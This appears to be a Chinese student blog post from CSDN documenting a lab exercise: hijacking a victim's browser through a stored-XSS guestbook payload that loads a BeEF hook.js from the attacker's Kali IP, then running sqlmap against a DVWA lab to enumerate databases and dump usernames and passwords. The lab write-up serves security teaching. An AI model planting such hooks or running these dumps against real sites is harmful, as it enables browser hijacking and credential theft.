网络渗透实验三:XSS用Beef劫持被攻击者客户端浏览器。Beef基础,SQL注入使用SQLMAP

已于 2022-11-29 19:17:14 修改
阅读量545 收藏 1
点赞数
文章标签: 安全 web安全 linux xss sql
于 2022-11-07 18:50:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/127736807
版权

第一部分:XSS用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

kali和靶机都采用桥接模式。然后让kali和受害者连接同一个手机热点!!

IIS服务器配置情况:

把访问的默认界面设置为:Message.asp

ip分配情况:

 使用AWVS扫描发现有XSS漏洞

 Kali使用beef生成恶意代码,截图。

在kali上先安装beef-xss

然后输入命令:

beef-xss

访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://Kali的IP地址:3000/hook.js"></script>

<script src="http://Kali的IP地址:3000/hook.js"></script>

管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为百度,将你在beff中的配置截图。

受害者页面:为百度的主页面(放不了图)

让受害者屏幕弹出字体

beef-xss配置:

受害者视角:

SQL部分:

1.注入点发现

 输入1',出现报错,判断存在注入漏洞

2.枚举当前使用的数据库名称和用户名。 

使用sqlmap

输入命令:

sqlmap -u "URL" --cookie="COOKIE的值" --current  -db(当前数据库名称) --current-user(当前用户名称)

URL和COOKIE的值需要根据需求更改

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" --current-db --current-user

 

3.枚举数据库用户名和密码

使用sqlmap

命令:

sqlmap -u "URL" --cookie='COOKIE的值' -D 数据库名称 --string="Surname" --users --password

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de' -D dvwa --string="Surname" --users --password

 

4.枚举数据库

sqlmap命令:

sqlmap -u "URL"--cookie="COOKIE的值" --dbs (查询当前数据库)

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"--cookie="security=low;PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de" --dbs

5.枚举数据库和指定数据库的数据表

sqlmap命令:

sqlmap -u "URL" --cookie="COOKIE的值" -D dvwa(数据库名) --tables

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" -D dvwa --tables

 

6.获取指定数据库和表中所有列的信息

这里选择爆users表中的所有列

sqlmap命令:

sqlmap -u "URL" --cookie="COOKIE的值" -D dvwa(数据库名称) -T users (表的名称)--columns

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" -D dvwa -T users --columns

 

7.枚举指定数据表中的所有用户名与密码,并down到本地。

sqlmap命令:

sqlmap -u "URL" --cookie="COOKIE的值" -D dvwa(数据库名称) -T users(表的名称) -C user,password(求的字段名称) --dump

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" -D dvwa -T users -C user,password --dump

 

 

 

 

墨言ink
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全beef-xss实操以及xss修复方案
你在看屏幕的同时,屏幕也在注视着你
09-07 2189
beef-xss实操
网络安全技术+XSS攻击和SQL注入攻击
04-11
XSS攻击和SQL注入攻击 网络安全技术初级学生
使用Filter针对Xss攻击,sql注入,服务器访问白名单,以及csrf进行安全校验
07-18
主要使用Filter针对Xss攻击,sql注入,服务器访问白名单,以及csrf进行安全校验 1,主要实现的是三大块功能:Xss攻击,sql注入,服务器白名单,以及csrf 2,此Filter为真实项目部署,在XssHttpServletRequestWrapper.java文件中的cleanSqlKeyWords方法为具体的Xss拦截逻辑,可根根据自己的需要进行完善 3,服务器白名单为单独的一个工具包,在文章最后给出 4,文章开发环境为JDK1.8,使用SpringBoot框架进行开发 5,文章会分享出整个Filter文件包,包含四个java文件: 5.1,public class CrosXssFilter implements Filter 5.2,public class CrosXssFilterConfig implements WebMvcConfigurer 5.3,public class WebSecurityConfiguration extends WebSecurityConfigurerAdapter 5.4,public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper 6,服务器白名单校验的java文件: 6.1,public class ServerWhiteListUtil 7,如果不要需要使用服务器白名单功能,那么,注释CrosXssFilter.java 文件的36-39行文件代码即可 原文链接:https://blog.csdn.net/zlxls/article/details/107432468
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。 二、XSS漏洞的危害 (1)网络钓鱼,包括盗取各类用户账号; (2)窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; (3)劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等; (4)强制弹出广告页面、刷流量等; (5)网页挂马; (6)进行恶意操作,例如任意篡改页面信息、删除文章等; (7)进行大量的客户端攻击,如DDoS攻击; (8)获取客户端信息,例如用户的浏览历史、真实IP、开放端口等; (9)控制受害者机器向其他网站发起攻击; (10)结合其他漏洞,如CSRF漏洞,实施进一步作恶; (11)提升用户权限,包括进一步渗透网站; (12)传播跨站脚本蠕虫等; 三、过滤器配置 web.xml配置 XssFilter com.xxx.Filter.XssFilter XssFilter /*
Kali Linux渗透测试 100 利用工具-Beef
kevinhanser
03-26 3165
本文记录 Kali Linux 2018.1 学习使用渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 浏览器攻击面应用普遍转移到 B/S 架构,浏览器成为统一客户端程序 结合社火工程学方法对浏览器进行攻击 攻击浏览器该用户 通过注入的 JS 脚本,利用浏览器攻击其他网站 Beef生成、交付 pay
使用wifi-pumpkin搭建钓鱼wifi(仅供学习用途)
热门推荐
qq_42001855的博客
08-14 1万+
实验软件及工具 WiFi-Pumpkin WiFi-Pumpkin是一款专用于无线环境渗透测试的完整框架,利用该工具可以伪造接入点完成中间人攻击,同时也支持一些其他的无线渗透测试功能。旨在提供更安全的无线网络服务,该工具可以用来监听目标的流量数据,通过无线钓鱼的方式来捕获不知情的用户,以此来达到监控目标用户数据流量的目的,WiFi-Pumpkin的安装过程将会在漏洞利用中详细讲解。 BEEF...
BeEF-XSS实验手记
二歪的防痴呆笔记
04-02 2256
这里使用的是Kali里面预装的BeEF-XSS,在Kali里面打开 应用程序-08-漏洞利用工具集-beef XSS framework。 或者直接运行beef-xss命令运行: kali已经把beef-xss做成服务了,可以使用systemctl 命令来启动或关闭beef服务器 systemctl start beef-xss.service #开启beef systemctl sto...
利用Beef进行XSS会话劫持
Deeeelete的博客
02-09 1438
1.登入靶机中的DVWA环境,安全等级调到最低,进入xss环境界面2.打开自带的beef软件第一次使用会提示你修改密码vim /etc/beef-xss/config.yaml打开修改,将密码修改成其他任意的内容就可以重新打开软件了。保存退出然后重新打开软件就可以正常进入了登录密码就是我们刚才修改的,输入然后登录3.回到终端,因为beef打开会默认开一个终端和一个浏览器界面,我们找到beff为我们...
浏览器攻击框架BeEF Part 6:攻击用户与攻击浏览器
Fly_鹏程万里
08-24 695
前言 这一章介绍如何使用BeEF来攻击用户和浏览器,攻击用户和浏览器的效果相对于上一章来说比较简单,效果也直接有效。 查看之前的五篇文章: 攻击用户 攻击用户可分为三部分:内容劫持、捕获用户输入、社会工程学。 内容劫持 内容劫持是指替换被勾连的浏览器中当前页面内容,比如替换被勾连的浏览器中当前页面中所有的&lt;a&gt;元素的href。 BeEF自带了很多内容劫持相关的攻击模块: ...
浅谈一下xss工具----beef
划水的小白白
05-07 3468
今天主要聊一下,从认识xss的危害到beef-xss的利用 beef是一个类似与sql注入sqlmap一样,也是一种工具。 一、xss简介 定义: 跨站脚本攻击。xss是一种在web应用中的计算机安全漏洞, 它允许web用户将一些恶意代码植入到提供给其它用户使用的页面中 种类: 反射型xss: 提交得数据成功的实现了xss,但是仅仅是对你这次访问产生了影响,...
SpringBoot整合XssFilter,Jsoup等实现请求参数的过滤,处理Xss攻击及sql注入.zip
02-09
原理过程 Springboot中会使用FilterRegistrationBean来注册Filter,Filter是Servlet规范里面的,属于容器范围,Springboot中没有web.xml,那Springboot中,不用管Filter是如何交给Ser......处理Xss攻击及sql注入.zip
Kali中Beef使用教程
weixin_43287317的博客
04-02 5179
Kali中Beef使用教程
实验三 XSSSQL注入
m0_62685257的博客
11-21 655
实验三 XSSSQL注入
实训实训实训
IWANnaaa的博客
04-03 4735
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.1...
在公网[阿里云服务器]部署Beef-XSS 供练习测试
R4bbit
06-30 3087
添加kali linux 源 方便直接apt-get install 下载软件 搭建php-apache服务器 apt-get install php7.0 apt-get install apache2 这里注意一下,最好是先安装apache再安装php,这样php在安装的时候会连apache所要的文件一并安装。 安装beef-xss平台 apt-get beef-xss 。 记住...
BEEF的简介与使用
永远是少年
10-31 1990
今天继续给大家介绍渗透测试相关知识,本文主要内容是BEEF的简介与使用。 一、BEEF简介 二、BEEF渗透测试实战
kali中浏览器攻击框架BeEF使用
爱国小白帽
02-24 7791
BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,至今还在维护。是由ruby语言开发的专门针对浏览器攻击的框架。这个框架也属于cs的结构 实验环境: PHPstudy 火狐浏览器、IE DVWA靶场 kali 安装: 新版kali里面没有需要安装,命令如下: apt-get install beef-x...
利用beef盗取浏览器cookie,并实现页面跳转
鲨鱼辣椒的博客
05-19 1762
实验环境 KALI kali中需要安装beef工具 DVWA靶场 客户端 我是在本地搭的靶场,然后开两台虚拟机,一台kali当作攻击者,一台任何系统的主机 搭建靶场 首先搭建靶场,开启phpstudy让让别人可以访问就可以了(我这边的靶场是安装好的,如果没有安装的话可以先去下载) 下载安装步骤:先去phpstady官网下载一个最新版的phpstudy(这个最新版的不用配置环境直接安装就能用特别方便),然后找到DWVS的数据包下载下来(如果找不到的话我可以发给你),放到phpstudy的ww
BeEF
zhaji001
09-17 1077
官方: https://beefproject.com/ GitHub: https://github.com/beefproject/beef kali启动beef: /usr/share/beef-xss# ./beef [15:07:21][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000]. [15:07:21][*]...
xss攻击 beef
最新发布
09-06
XSS攻击是一种跨站脚本攻击,它利用网页应用程序对用户输入的信任来注入恶意的客户端脚本。而beef则是一种用于进行XSS攻击的平台。beef-xssbeef平台的一部分,它允许攻击者在受害者的浏览器中执行恶意代码。 使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值